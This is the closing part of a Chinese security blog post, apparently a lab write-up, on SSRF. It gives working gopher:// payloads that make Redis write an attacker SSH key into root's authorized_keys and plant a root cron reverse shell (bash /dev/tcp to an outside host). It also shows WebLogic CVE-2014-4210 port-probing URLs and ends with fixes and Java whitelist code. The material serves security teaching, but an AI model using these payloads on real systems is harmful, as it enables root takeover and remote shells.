<p>根据网上写密钥有两种协议可以使用，一种是dict，一种是gopher。测试使用dict协议写不成功，写入后不能连接，此处使用gopher写密钥。</p>
<p>使用的payload为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$401%0d%0a%0a%0a%0assh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC/Xn7uoTwU+RX1gYTBrmZlNwU2KUBICuxflTtFwfbZM3wAy/FmZmtpCf2UvZFb/MfC1i......2pyARF0YjMmjMevpQwjeN3DD3cw/bO4XMJC7KnUGil4ptcxmgTsz0UsdXAd9J2UdwPfmoM9%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$11%0d%0a/root/.ssh/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$15%0d%0aauthorized_keys%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a</span><br></pre></td></tr></table></figure>

<p>payload 解码为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">gopher://127.0.0.1:6379/_*3</span><br><span class="line">$3</span><br><span class="line">set</span><br><span class="line">$1</span><br><span class="line">1</span><br><span class="line">$401</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC/Xn7uoTwU RX1gYTBrmZlNwU2KUBICuxflTtFwfbZM3wAy/FmZmtpCf2UvZFb/MfC1i......2pyARF0YjMmjMevpQwjeN3DD3cw/bO4XMJC7KnUGil4ptcxmgTsz0UsdXAd9J2UdwPfmoM9</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">*4</span><br><span class="line">$6</span><br><span class="line">config</span><br><span class="line">$3</span><br><span class="line">set</span><br><span class="line">$3</span><br><span class="line">dir</span><br><span class="line">$11</span><br><span class="line">/root/.ssh/</span><br><span class="line">*4</span><br><span class="line">$6</span><br><span class="line">config</span><br><span class="line">$3</span><br><span class="line">set</span><br><span class="line">$10</span><br><span class="line">dbfilename</span><br><span class="line">$15</span><br><span class="line">authorized_keys</span><br><span class="line">*1</span><br><span class="line">$4</span><br><span class="line">save</span><br><span class="line">*1</span><br><span class="line">$4</span><br><span class="line">quit</span><br></pre></td></tr></table></figure>

<p>payload由joychou的反弹shell修改而来，主要就是替换了写入文件的位置和文件内容。然后修改文件的长度。</p>
<p>然后尝试登陆，输入创建密钥的密码后，登陆成功。</p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190903143050-5f6338be-ce14-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190903143050-5f6338be-ce14-1.png" alt="img"></a></p>
<p>2）利用redis写定时任务来反弹shell</p>
<p>既然提到反弹shell，就需要利用一台外网主机。此处使用了nc做端口监听。</p>
<p>使用payload为以下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$61%0d%0a%0a%0a%0a*/1 * * * * bash -i &gt;&amp; /dev/tcp/x.x.x.x/2233 0&gt;&amp;1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a</span><br></pre></td></tr></table></figure>

<p>解码后的内容就是：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">gopher://127.0.0.1:6379/_*3</span><br><span class="line">$3</span><br><span class="line">set</span><br><span class="line">$1</span><br><span class="line">1</span><br><span class="line">$61</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">*/1 * * * * bash -i &gt;&amp; /dev/tcp/x.x.x.x/2233 0&gt;&amp;1</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">*4</span><br><span class="line">$6</span><br><span class="line">config</span><br><span class="line">$3</span><br><span class="line">set</span><br><span class="line">$3</span><br><span class="line">dir</span><br><span class="line">$16</span><br><span class="line">/var/spool/cron/</span><br><span class="line">*4</span><br><span class="line">$6</span><br><span class="line">config</span><br><span class="line">$3</span><br><span class="line">set</span><br><span class="line">$10</span><br><span class="line">dbfilename</span><br><span class="line">$4</span><br><span class="line">root</span><br><span class="line">*1</span><br><span class="line">$4</span><br><span class="line">save</span><br><span class="line">*1</span><br><span class="line">$4</span><br><span class="line">quit</span><br></pre></td></tr></table></figure>

<p>来自：<a href="https://joychou.org/web/phpssrf.html" target="_blank" rel="noopener">https://joychou.org/web/phpssrf.html</a></p>
<p>其中$61为我的vps地址，也就是<code>%0a%0a%0a*/1 * * * * bash -i &gt;&amp; /dev/tcp/127.0.0.1/2333 0&gt;&amp;1%0a%0a%0a%0a</code>的字符串长度。执行后稍等片刻就可以收到反弹的shell了。同时需要写入的命令前后要加几个回车。</p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190903143051-5fa53c50-ce14-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190903143051-5fa53c50-ce14-1.png" alt="img"></a></p>
<p>根据前文的提示，打开/passwd文件就可以找到flag了。</p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190903143100-6540d21e-ce14-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190903143100-6540d21e-ce14-1.png" alt="img"></a></p>
<p>在网站页面上输入这一串字符，就可以结束这场SSRF之旅了。</p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190903143101-658e8810-ce14-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190903143101-658e8810-ce14-1.png" alt="img"></a></p>
<h1 id="5-CMS实战演示"><a href="#5-CMS实战演示" class="headerlink" title="5. CMS实战演示"></a>5. CMS实战演示</h1><h2 id="5-1-漏洞环境"><a href="#5-1-漏洞环境" class="headerlink" title="5.1 漏洞环境"></a>5.1 漏洞环境</h2><p>vulhub、weblogic、ssrf</p>
<h2 id="5-2-漏洞介绍"><a href="#5-2-漏洞介绍" class="headerlink" title="5.2 漏洞介绍"></a>5.2 漏洞介绍</h2><p>CVE-2014-4210，weblogic的uddiexplorer.war存在安全组件漏洞，此漏洞可通过HTTP协议利用，未经身份验证的远程攻击者可利用此漏洞影响受影响组件的机密性。该漏洞的影响版本包括：10.0.2.0, 10.3.6.0</p>
<h2 id="5-3-下载地址"><a href="#5-3-下载地址" class="headerlink" title="5.3 下载地址"></a>5.3 下载地址</h2><p><a href="https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf" target="_blank" rel="noopener">https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf</a></p>
<p>下载vulhub后，进入对应的安装目录，执行<code>docker-compose up -d</code>,会自动创建docker镜像。</p>
<p>构建完成后访问如下地址：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/uddiexplorer/SearchPublicRegistries.jsp</span><br></pre></td></tr></table></figure>

<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190903143101-65e2a206-ce14-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190903143101-65e2a206-ce14-1.png" alt="img"></a></p>
<p>访问如下地址时返回，代表端口未开放：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&amp;txtSearchname=sdf&amp;txtSearchkey=&amp;txtSearchfor=&amp;selfor=Business+location&amp;btnSubmit=Search&amp;operator=http://127.0.0.1:80</span><br></pre></td></tr></table></figure>

<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190903143102-663805ac-ce14-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190903143102-663805ac-ce14-1.png" alt="img"></a></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&amp;txtSearchname=sdf&amp;txtSearchkey=&amp;txtSearchfor=&amp;selfor=Business+location&amp;btnSubmit=Search&amp;operator=http://127.0.0.1:7001</span><br></pre></td></tr></table></figure>

<p>响应可以看到返回404，证明端口开放：</p>
<p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20190903143102-668750d0-ce14-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20190903143102-668750d0-ce14-1.png" alt="img"></a></p>
<p>然后可以根据遍历查看开放的端口服务，在根据开放的服务来决定是否能不能执行内网攻击。而实际中越到的SSRF大都是探测类使用，因为能正好搭配使用的情况，而且还可以查看或者反弹的，概率值得讨论。</p>
<h2 id="5-4-漏洞修复"><a href="#5-4-漏洞修复" class="headerlink" title="5.4 漏洞修复"></a>5.4 漏洞修复</h2><h3 id="5-4-1-删除server-lib-uddiexplorer-war下的相应jsp文件。"><a href="#5-4-1-删除server-lib-uddiexplorer-war下的相应jsp文件。" class="headerlink" title="5.4.1 删除server/lib/uddiexplorer.war下的相应jsp文件。"></a>5.4.1 删除server/lib/uddiexplorer.war下的相应jsp文件。</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">jar -xvf uddiexplorer.war </span><br><span class="line">rm jsp-files </span><br><span class="line">jar -cvfM uddiexplorer.war uddiexplorer/</span><br></pre></td></tr></table></figure>

<h2 id="5-4-2-在官方的漏洞通报上找到补丁安装"><a href="#5-4-2-在官方的漏洞通报上找到补丁安装" class="headerlink" title="5.4.2 在官方的漏洞通报上找到补丁安装"></a>5.4.2 在官方的漏洞通报上找到补丁安装</h2><p><a href="https://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html" target="_blank" rel="noopener">https://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html</a></p>
<h1 id="6-漏洞修复"><a href="#6-漏洞修复" class="headerlink" title="6. 漏洞修复"></a>6. 漏洞修复</h1><h2 id="6-1-限制返回信息的，例如请求文件，只返回文件是否请求成功，没有请求成功到文件统一返回错误信息。"><a href="#6-1-限制返回信息的，例如请求文件，只返回文件是否请求成功，没有请求成功到文件统一返回错误信息。" class="headerlink" title="6.1 限制返回信息的，例如请求文件，只返回文件是否请求成功，没有请求成功到文件统一返回错误信息。"></a>6.1 限制返回信息的，例如请求文件，只返回文件是否请求成功，没有请求成功到文件统一返回错误信息。</h2><h2 id="6-2-对请求地址设置白名单，只允许请求白名单内的地址。"><a href="#6-2-对请求地址设置白名单，只允许请求白名单内的地址。" class="headerlink" title="6.2 对请求地址设置白名单，只允许请求白名单内的地址。"></a>6.2 对请求地址设置白名单，只允许请求白名单内的地址。</h2><h2 id="6-3-禁用除http和https外的协议，如：file-，gopher-，dict-等"><a href="#6-3-禁用除http和https外的协议，如：file-，gopher-，dict-等" class="headerlink" title="6.3 禁用除http和https外的协议，如：file://，gopher://，dict://等"></a>6.3 禁用除http和https外的协议，如：file://，gopher://，dict://等</h2><h2 id="6-4-限制请求的端口为固定服务端口，如：80，443"><a href="#6-4-限制请求的端口为固定服务端口，如：80，443" class="headerlink" title="6.4 限制请求的端口为固定服务端口，如：80，443"></a>6.4 限制请求的端口为固定服务端口，如：80，443</h2><h2 id="6-5-Java类代码修复（来自joychou）"><a href="#6-5-Java类代码修复（来自joychou）" class="headerlink" title="6.5 Java类代码修复（来自joychou）"></a>6.5 Java类代码修复（来自joychou）</h2><p>方法调用：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">String[] urlwhitelist = &#123;&quot;joychou.com&quot;, &quot;joychou.me&quot;&#125;;</span><br><span class="line">if (!UrlSecCheck(url, urlwhitelist)) &#123;</span><br><span class="line">    return;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>方法代码：</p>
<p>需要先添加guava库（目的是获取一级域名）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">&lt;dependency&gt;</span><br><span class="line">    &lt;groupId&gt;com.google.guava&lt;/groupId&gt;</span><br><span class="line">    &lt;artifactId&gt;guava&lt;/artifactId&gt;</span><br><span class="line">    &lt;version&gt;21.0&lt;/version&gt;</span><br><span class="line">&lt;/dependency&gt;</span><br><span class="line"></span><br><span class="line">方法实现：</span><br><span class="line">public static Boolean UrlSecCheck(String url, String[] urlwhitelist) &#123;</span><br><span class="line">    try &#123;</span><br><span class="line">        URL u = new URL(url);</span><br><span class="line">        // 只允许http和https的协议</span><br><span class="line">        if (!u.getProtocol().startsWith(&quot;http&quot;) &amp;&amp; !u.getProtocol().startsWith(&quot;https&quot;)) &#123;</span><br><span class="line">            return  false;</span><br><span class="line">        &#125;</span><br><span class="line">        // 获取域名，并转为小写</span><br><span class="line">        String host = u.getHost().toLowerCase();</span><br><span class="line">        // 获取一级域名</span><br><span class="line">        String rootDomain = InternetDomainName.from(host).topPrivateDomain().toString();</span><br><span class="line"></span><br><span class="line">        for (String whiteurl: urlwhitelist)&#123;</span><br><span class="line">            if (rootDomain.equals(whiteurl)) &#123;</span><br><span class="line">                return true;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        return false;</span><br><span class="line"></span><br><span class="line">    &#125; catch (Exception e) &#123;</span><br><span class="line">        return false;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
      
    </div>

    

    
    
    

    

    
      
    
    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/10/17/php文件包含漏洞/" rel="next" title="php文件包含漏洞">
                <i class="fa fa-chevron-left"></i> php文件包含漏洞
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">VegyChick</p>
              <div class="site-description motion-element" itemprop="description">沉迷渗透测试的信安菜鸟</div>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">13</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              

              
            </nav>
          

          

          

          

          

          
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#1-SSRF漏洞"><span class="nav-number">1.</span> <span class="nav-text">1. SSRF漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-1-漏洞简介"><span class="nav-number">1.1.</span> <span class="nav-text">1.1 漏洞简介</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#1-2-漏洞原理"><span class="nav-number">1.2.</span> <span class="nav-text">1.2 漏洞原理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#1-3-漏洞危害"><span class="nav-number">1.3.</span> <span class="nav-text">1.3 漏洞危害</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-3-1-扫描内网开放服务"><span class="nav-number">1.3.1.</span> <span class="nav-text">1.3.1 扫描内网开放服务</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-3-2-向内部任意主机的任意端口发送payload来攻击内网服务"><span class="nav-number">1.3.2.</span> <span class="nav-text">1.3.2 向内部任意主机的任意端口发送payload来攻击内网服务</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-3-3-DOS攻击（请求大文件，始终保持连接Keep-Alive-Always）"><span class="nav-number">1.3.3.</span> <span class="nav-text">1.3.3 DOS攻击（请求大文件，始终保持连接Keep-Alive Always）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-3-4-攻击内网的web应用，例如直接SQL注入、XSS攻击等"><span class="nav-number">1.3.4.</span> <span class="nav-text">1.3.4 攻击内网的web应用，例如直接SQL注入、XSS攻击等</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-3-5-利用file、gopher、dict协议读取本地文件、执行命令等"><span class="nav-number">1.3.5.</span> <span class="nav-text">1.3.5 利用file、gopher、dict协议读取本地文件、执行命令等</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#2-检测与绕过"><span class="nav-number">2.</span> <span class="nav-text">2. 检测与绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#2-1-漏洞检测"><span class="nav-number">2.1.</span> <span class="nav-text">2.1 漏洞检测</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-2-漏洞出现点"><span class="nav-number">2.2.</span> <span class="nav-text">2.2 漏洞出现点</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#2-2-1-分享"><span class="nav-number">2.2.1.</span> <span class="nav-text">2.2.1 分享</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-2-2-图片加载与下载"><span class="nav-number">2.2.2.</span> <span class="nav-text">2.2.2 图片加载与下载</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-2-3-图片、文章收藏功能"><span class="nav-number">2.2.3.</span> <span class="nav-text">2.2.3 图片、文章收藏功能</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-2-4-利用参数中的关键字来查找"><span class="nav-number">2.2.4.</span> <span class="nav-text">2.2.4 利用参数中的关键字来查找</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-3-漏洞绕过"><span class="nav-number">2.3.</span> <span class="nav-text">2.3 漏洞绕过</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#2-3-1-限制为http-www-xxx-com-域名时"><span class="nav-number">2.3.1.</span> <span class="nav-text">2.3.1 限制为http://www.xxx.com 域名时</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-3-2-限制请求IP不为内网地址"><span class="nav-number">2.3.2.</span> <span class="nav-text">2.3.2 限制请求IP不为内网地址</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-3-3-限制请求只为http协议"><span class="nav-number">2.3.3.</span> <span class="nav-text">2.3.3 限制请求只为http协议</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-3-4-其他"><span class="nav-number">2.3.4.</span> <span class="nav-text">2.3.4 其他</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#3-测试方法"><span class="nav-number">3.</span> <span class="nav-text">3. 测试方法</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#3-1-漏洞环境"><span class="nav-number">3.1.</span> <span class="nav-text">3.1 漏洞环境</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-2-利用工具"><span class="nav-number">3.2.</span> <span class="nav-text">3.2 利用工具</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-3-测试过程"><span class="nav-number">3.3.</span> <span class="nav-text">3.3 测试过程</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#4-实战演示"><span class="nav-number">4.</span> <span class="nav-text">4. 实战演示</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#4-1-漏洞环境"><span class="nav-number">4.1.</span> <span class="nav-text">4.1 漏洞环境</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-2-漏洞地址"><span class="nav-number">4.2.</span> <span class="nav-text">4.2 漏洞地址</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-3-利用工具"><span class="nav-number">4.3.</span> <span class="nav-text">4.3 利用工具</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-4-漏洞介绍"><span class="nav-number">4.4.</span> <span class="nav-text">4.4 漏洞介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-5-测试过程"><span class="nav-number">4.5.</span> <span class="nav-text">4.5 测试过程</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#5-CMS实战演示"><span class="nav-number">5.</span> <span class="nav-text">5. CMS实战演示</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#5-1-漏洞环境"><span class="nav-number">5.1.</span> <span class="nav-text">5.1 漏洞环境</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5-2-漏洞介绍"><span class="nav-number">5.2.</span> <span class="nav-text">5.2 漏洞介绍</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5-3-下载地址"><span class="nav-number">5.3.</span> <span class="nav-text">5.3 下载地址</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5-4-漏洞修复"><span class="nav-number">5.4.</span> <span class="nav-text">5.4 漏洞修复</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#5-4-1-删除server-lib-uddiexplorer-war下的相应jsp文件。"><span class="nav-number">5.4.1.</span> <span class="nav-text">5.4.1 删除server/lib/uddiexplorer.war下的相应jsp文件。</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5-4-2-在官方的漏洞通报上找到补丁安装"><span class="nav-number">5.5.</span> <span class="nav-text">5.4.2 在官方的漏洞通报上找到补丁安装</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#6-漏洞修复"><span class="nav-number">6.</span> <span class="nav-text">6. 漏洞修复</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#6-1-限制返回信息的，例如请求文件，只返回文件是否请求成功，没有请求成功到文件统一返回错误信息。"><span class="nav-number">6.1.</span> <span class="nav-text">6.1 限制返回信息的，例如请求文件，只返回文件是否请求成功，没有请求成功到文件统一返回错误信息。</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#6-2-对请求地址设置白名单，只允许请求白名单内的地址。"><span class="nav-number">6.2.</span> <span class="nav-text">6.2 对请求地址设置白名单，只允许请求白名单内的地址。</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#6-3-禁用除http和https外的协议，如：file-，gopher-，dict-等"><span class="nav-number">6.3.</span> <span class="nav-text">6.3 禁用除http和https外的协议，如：file://，gopher://，dict://等</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#6-4-限制请求的端口为固定服务端口，如：80，443"><span class="nav-number">6.4.</span> <span class="nav-text">6.4 限制请求的端口为固定服务端口，如：80，443</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#6-5-Java类代码修复（来自joychou）"><span class="nav-number">6.5.</span> <span class="nav-text">6.5 Java类代码修复（来自joychou）</span></a></li></ol></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>
  


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">VegyChick</span>

  

  
</div>


  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.9.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v7.2.0</div>




        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=3.4.1"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/utils.js?v=7.2.0"></script>

  <script src="/js/motion.js?v=7.2.0"></script>



  
  


  <script src="/js/schemes/muse.js?v=7.2.0"></script>



  
  <script src="/js/scrollspy.js?v=7.2.0"></script>
<script src="/js/post-details.js?v=7.2.0"></script>



  


  <script src="/js/next-boot.js?v=7.2.0"></script>


  

  

  

  


  


  




  

  

  

  

  

  

  

  

  

  

  

  

  

  

</body>
</html>
